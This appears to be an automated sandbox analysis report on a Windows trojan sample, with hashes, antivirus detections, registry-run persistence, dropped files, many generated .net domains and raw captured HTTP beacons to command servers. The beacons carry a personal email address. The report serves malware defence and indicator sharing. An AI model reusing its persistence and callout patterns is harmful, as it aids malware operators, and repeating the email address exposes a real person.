Analysis Date2015-10-30 21:39:45
MD57ecc6f94246d614efa5098f7aa799e88
SHA1e950d911586338a58fc5909b9f54065caac6d679

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 5e6d430188db0801642be69ef047d803 sha1: a075cb31c0a9d6f9691b1d4556602cf145a624fd size: 302080
Section.rdata md5: bc546124435915c8655aabf4a90bae98 sha1: a63c0d1ebabee82e36154d97cd45d506f7073ce4 size: 35840
Section.data md5: a7d97324045b08e43edeae33cdc9ca3c sha1: 818a646980f821d8bafff13e4501c5930ecda174 size: 88576
Timestamp2014-10-30 10:31:41
PackerMicrosoft Visual C++ ?.?
PEhasha226fa903f678f89981fb78bfefe673ac0d6fbb9
IMPhash1339a4c2d29179ebdf6ddafc40cc0bb8
AVRisingno_virus
AVMcafeeno_virus
AVAvira (antivir)BDS/Zegost.Gen4
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Downloader-TLD [Trj]
AVEset (nod32)Win32/Rodecap.BE
AVGrisoft (avg)Win32/Cryptor
AVSymantecDownloader.Upatre!g15
AVFortinetW32/Agent.VNC!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7Trojan ( 004cb2771 )
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.Z
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMalwareBytesTrojan.Zbot.WHE
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.FBAccountLock
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTSPY_NIVDORT.SMB
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVClamAVno_virus
AVDr. Webno_virus
AVF-SecureGen:Variant.Symmi.22722
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Propagation Input SSDP Extensible ➝
C:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\ukvbiwfgs.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.cxqcr
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qpxqwgfcbyfgwop\xijbvxwy.exe"

Network Details:

DNSmorningduring.net
Type: A
98.139.135.129
DNSamountduring.net
Type: A
195.22.26.231
DNSamountduring.net
Type: A
195.22.26.252
DNSamountduring.net
Type: A
195.22.26.253
DNSamountduring.net
Type: A
195.22.26.254
DNSthinknorth.net
Type: A
184.168.221.58
DNSoftennorth.net
Type: A
208.100.26.234
DNSmelbourneit.hotkeysparking.com
Type: A
8.5.1.16
DNSmiddlenorth.net
Type: A
64.99.80.30
DNStwelvenorth.net
Type: A
192.64.119.26
DNSoftenlength.net
Type: A
DNSalonelength.net
Type: A
DNSoftennotice.net
Type: A
DNSalonenotice.net
Type: A
DNSoftenindeed.net
Type: A
DNSaloneindeed.net
Type: A
DNSoftenduring.net
Type: A
DNSaloneduring.net
Type: A
DNSmiddlelength.net
Type: A
DNStwelvelength.net
Type: A
DNSmiddlenotice.net
Type: A
DNStwelvenotice.net
Type: A
DNSmiddleindeed.net
Type: A
DNStwelveindeed.net
Type: A
DNSmiddleduring.net
Type: A
DNStwelveduring.net
Type: A
DNSratherlength.net
Type: A
DNSmorninglength.net
Type: A
DNSrathernotice.net
Type: A
DNSmorningnotice.net
Type: A
DNSratherindeed.net
Type: A
DNSmorningindeed.net
Type: A
DNSratherduring.net
Type: A
DNSstrangelength.net
Type: A
DNShistorylength.net
Type: A
DNSstrangenotice.net
Type: A
DNShistorynotice.net
Type: A
DNSstrangeindeed.net
Type: A
DNShistoryindeed.net
Type: A
DNSstrangeduring.net
Type: A
DNShistoryduring.net
Type: A
DNSamountlength.net
Type: A
DNSweatherlength.net
Type: A
DNSamountnotice.net
Type: A
DNSweathernotice.net
Type: A
DNSamountindeed.net
Type: A
DNSweatherindeed.net
Type: A
DNSweatherduring.net
Type: A
DNSthicklength.net
Type: A
DNSclasslength.net
Type: A
DNSthicknotice.net
Type: A
DNSclassnotice.net
Type: A
DNSthickindeed.net
Type: A
DNSclassindeed.net
Type: A
DNSthickduring.net
Type: A
DNSclassduring.net
Type: A
DNSthinkclear.net
Type: A
DNSpresentclear.net
Type: A
DNSthinkgeneral.net
Type: A
DNSpresentgeneral.net
Type: A
DNSthinkinclude.net
Type: A
DNSpresentinclude.net
Type: A
DNSpresentnorth.net
Type: A
DNSchiefclear.net
Type: A
DNScollegeclear.net
Type: A
DNSchiefgeneral.net
Type: A
DNScollegegeneral.net
Type: A
DNSchiefinclude.net
Type: A
DNScollegeinclude.net
Type: A
DNSchiefnorth.net
Type: A
DNScollegenorth.net
Type: A
DNSoftenclear.net
Type: A
DNSaloneclear.net
Type: A
DNSoftengeneral.net
Type: A
DNSalonegeneral.net
Type: A
DNSofteninclude.net
Type: A
DNSaloneinclude.net
Type: A
DNSalonenorth.net
Type: A
DNSmiddleclear.net
Type: A
DNStwelveclear.net
Type: A
DNSmiddlegeneral.net
Type: A
DNStwelvegeneral.net
Type: A
DNSmiddleinclude.net
Type: A
DNStwelveinclude.net
Type: A
DNSratherclear.net
Type: A
DNSmorningclear.net
Type: A
DNSrathergeneral.net
Type: A
DNSmorninggeneral.net
Type: A
DNSratherinclude.net
Type: A
HTTP GEThttp://morningduring.net/index.php?email=oana.busuioc@uti.ro&method=post&len
User-Agent:
HTTP GEThttp://amountduring.net/index.php?email=oana.busuioc@uti.ro&method=post&len
User-Agent:
HTTP GEThttp://thinknorth.net/index.php?email=oana.busuioc@uti.ro&method=post&len
User-Agent:
HTTP GEThttp://oftennorth.net/index.php?email=oana.busuioc@uti.ro&method=post&len
User-Agent:
HTTP GEThttp://middlegeneral.net/index.php?email=oana.busuioc@uti.ro&method=post&len
User-Agent:
HTTP GEThttp://middlenorth.net/index.php?email=oana.busuioc@uti.ro&method=post&len
User-Agent:
HTTP GEThttp://twelvenorth.net/index.php?email=oana.busuioc@uti.ro&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 98.139.135.129:80
Flows TCP192.168.1.1:1032 ➝ 195.22.26.231:80
Flows TCP192.168.1.1:1033 ➝ 184.168.221.58:80
Flows TCP192.168.1.1:1034 ➝ 208.100.26.234:80
Flows TCP192.168.1.1:1035 ➝ 8.5.1.16:80
Flows TCP192.168.1.1:1036 ➝ 64.99.80.30:80
Flows TCP192.168.1.1:1037 ➝ 192.64.119.26:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f616e 612e6275 7375696f   mail=oana.busuio
0x00000020 (00032)   63407574 692e726f 266d6574 686f643d   c@uti.ro&method=
0x00000030 (00048)   706f7374 266c656e 20485454 502f312e   post&len HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 206d6f72 6e696e67   e..Host: morning
0x00000070 (00112)   64757269 6e672e6e 65740d0a 0d0a       during.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f616e 612e6275 7375696f   mail=oana.busuio
0x00000020 (00032)   63407574 692e726f 266d6574 686f643d   c@uti.ro&method=
0x00000030 (00048)   706f7374 266c656e 20485454 502f312e   post&len HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20616d6f 756e7464   e..Host: amountd
0x00000070 (00112)   7572696e 672e6e65 740d0a0d 0a0a       uring.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f616e 612e6275 7375696f   mail=oana.busuio
0x00000020 (00032)   63407574 692e726f 266d6574 686f643d   c@uti.ro&method=
0x00000030 (00048)   706f7374 266c656e 20485454 502f312e   post&len HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20746869 6e6b6e6f   e..Host: thinkno
0x00000070 (00112)   7274682e 6e65740d 0a0d0a0d 0a0a       rth.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f616e 612e6275 7375696f   mail=oana.busuio
0x00000020 (00032)   63407574 692e726f 266d6574 686f643d   c@uti.ro&method=
0x00000030 (00048)   706f7374 266c656e 20485454 502f312e   post&len HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 206f6674 656e6e6f   e..Host: oftenno
0x00000070 (00112)   7274682e 6e65740d 0a0d0a0d 0a0a       rth.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f616e 612e6275 7375696f   mail=oana.busuio
0x00000020 (00032)   63407574 692e726f 266d6574 686f643d   c@uti.ro&method=
0x00000030 (00048)   706f7374 266c656e 20485454 502f312e   post&len HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 206d6964 646c6567   e..Host: middleg
0x00000070 (00112)   656e6572 616c2e6e 65740d0a 0d0a       eneral.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f616e 612e6275 7375696f   mail=oana.busuio
0x00000020 (00032)   63407574 692e726f 266d6574 686f643d   c@uti.ro&method=
0x00000030 (00048)   706f7374 266c656e 20485454 502f312e   post&len HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 206d6964 646c656e   e..Host: middlen
0x00000070 (00112)   6f727468 2e6e6574 0d0a0d0a 0d0a       orth.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f616e 612e6275 7375696f   mail=oana.busuio
0x00000020 (00032)   63407574 692e726f 266d6574 686f643d   c@uti.ro&method=
0x00000030 (00048)   706f7374 266c656e 20485454 502f312e   post&len HTTP/1.
0x00000040 (00064)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000050 (00080)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000060 (00096)   650d0a48 6f73743a 20747765 6c76656e   e..Host: twelven
0x00000070 (00112)   6f727468 2e6e6574 0d0a0d0a 0d0a       orth.net......


Strings